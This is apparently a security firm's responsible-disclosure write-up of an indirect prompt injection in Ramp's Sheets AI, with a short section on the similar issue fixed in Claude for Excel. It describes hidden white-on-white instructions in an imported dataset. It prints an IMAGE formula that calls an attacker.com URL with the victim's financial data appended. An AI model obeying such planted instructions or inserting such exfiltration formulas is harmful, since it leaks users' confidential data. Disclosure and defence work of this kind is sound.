This vulnerability was responsibly disclosed to Ramp, and Ramp’s security team has indicated the issue was resolved on March 16, 2026.
Context
Ramp's Sheets AI is an agentic product that helps users operate on spreadsheets, comparable to Claude for Excel. The feature can edit spreadsheets without a human-in-the-loop and was vulnerable to data exfiltration risks due to its ability to insert formulas that trigger external communication.
Ramp’s security team has indicated that, following our report, the issue was resolved. We appreciate Ramp’s dedication to maintaining a strong AI security posture and addressing vulnerabilities as they arise. Further details on the responsible disclosure are at the end of the article.
In this article, we demonstrate that an indirect prompt injection concealed in an untrusted, externally sourced dataset could trigger the exfiltration of confidential financial data from the user’s workspace by manipulating Ramp’s AI to insert a malicious formula. No user approval is required.
PromptArmor identified a very similar risk in Claude for Excel – details on the remediations applied by Anthropic are at the bottom of the article.
The Attack Chain
The user opens a workbook containing a confidential financial model
The user imports an external dataset to complement their model
A spreadsheet containing industry growth statistics is imported into a separate tab from the financial model. The user aims to compare their company’s growth to industry benchmarks. The reference dataset comes from an untrusted external source, e.g., a website, an email, or a shared drive.
The reference dataset contains a concealed prompt injection
An indirect prompt injection is hidden in white-on-white text, and is crafted to manipulate Ramp’s AI to:
The user asks Ramp AI to compare their financial model against the industry statistics
Ramp AI falls for the prompt injection and inserts a malicious formula
Ramp AI is manipulated into building an IMAGE formula that uses an attacker’s URL and appends the victim’s sensitive data to the end of the link.
=IMAGE(“https://attacker.com/visualize.png?
{victim_sensitive_financial_data_here}”)
The malicious formula makes a network request, exfiltrating financial data
Ramp AI inserts the malicious formula without requiring any user approval. The malicious formula triggers a network request to the attacker’s server. This network request exposes the sensitive financial data that was in the initial confidential “Financial Model” sheet (which Ramp AI included in the formula due to the attacker’s prompt injection).
Below, the attacker’s server logs display the victim’s sensitive financial data:
Responsible Disclosure
The PromptArmor Threat Intel Team responsibly disclosed this vulnerability to Ramp. Ramp's security team indicated that the issue was resolved on March 16, 2026.
Timeline
Feb 19, 2026 PromptArmor discloses via security@ramp.com
How Claude for Excel Remediated
When Claude for Excel was released, PromptArmor identified a nearly identical risk – malicious formulas could trigger data exfiltration without users being presented an adequate opportunity for informed human review.
Note: Claude for Excel did leverage human-in-the-loop, but malicious formulas were not visible in the editing approval prompt, thereby impairing the protection's efficacy.
Anthropic updated Claude for Excel to display a red warning interstitial when a formula that can cause external network traffic is being inserted. The new warning displays the full formulas being inserted, and the documentation was updated to better inform users of the risk.